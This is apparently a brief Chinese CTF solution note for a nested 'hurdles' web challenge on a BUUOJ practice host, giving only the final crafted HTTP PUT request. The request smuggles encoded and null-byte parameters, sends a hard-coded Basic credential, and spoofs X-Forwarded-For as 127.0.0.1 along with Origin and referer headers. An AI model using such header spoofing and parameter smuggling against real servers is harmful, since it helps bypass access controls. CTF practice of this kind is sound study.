套娃
最终exp:
PUT /hurdles/!?get=flag&%26%3d%26%3d%26=%2500%0a HTTP/1.1
Host: node3.buuoj.cn:26310
Upgrade-Insecure-Requests: 1
User-Agent: 1337 browser v.9100
Authorization: Basic cGxheWVyOjU0ZWYzNmVjNzEyMDFmZGY5ZDE0MjNmZDI2Zjk3ZjZi
Accept: text/plain
Accept-Encoding: gzip, deflate
Accept-Language:ru
Connection: close
Content-Length: 9
Origin: https://ctf.bsidessf.net
referer: https://ctf.bsidessf.net/challenges
X-Forwarded-For: 13.37.13.37,127.0.0.1
cookie: Fortune=6265
hahah